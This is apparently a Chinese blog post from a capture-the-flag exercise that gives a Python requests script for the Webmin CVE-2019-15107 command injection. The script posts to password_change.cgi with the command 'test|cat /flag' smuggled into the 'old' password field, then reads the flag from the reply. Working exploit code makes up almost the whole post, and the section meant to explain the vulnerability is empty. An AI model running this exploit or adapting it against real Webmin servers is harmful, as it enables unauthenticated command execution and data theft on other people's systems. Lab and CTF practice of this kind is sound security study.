python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)

webmin漏洞CVE-2019-15107 漏洞原理:

python操作burp的requests插件实现批量化获取flag(webmin漏洞CVE-2019-15107)

使用burpsuit的右键copy as requests

burp0_url = "https://192.168.184.128:10000/password_change.cgi"
burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
需要处理一下post数据的返回编码,和https的交互问题,需要安装一个openssl的python库和引用库模块,将warning忽略掉
代码如下
 1 import requests
 2 requests.packages.urllib3.disable_warnings()
 3 
 4 
 5 burp0_url = "https://192.168.184.128:10000/password_change.cgi"
 6 burp0_cookies = {"redirect": "1", "testing": "1", "sid": "x", "sessiontest": "1"}
 7 burp0_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Referer": "https://192.168.184.128:10000/session_login.cgi", "Content-Type": "application/x-www-form-urlencoded"}
 8 burp0_data = {"user": "rootxx", "pam": '', "expired": "2", "old": "test|cat /flag", "new1": "test2", "new2": "test2"}
 9 flag = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, verify=False)
10 
11 # with open("./1.txt", "w") as f:
12 #     print(type(flag.content.decode("gbk")))
13 #     f.write(flag.content.decode("gbk"))
14 findflag = flag.content.decode("gbk")
15 result = "flag" in findflag
16 indexstart = findflag.find("flag")
17 print(findflag[indexstart:indexstart+11])
18 # print(result)

 




上一篇:基于php的Linux远程管理系统客户端的实现


下一篇:靶机练习 No.22 Vulnhub靶机 Breakout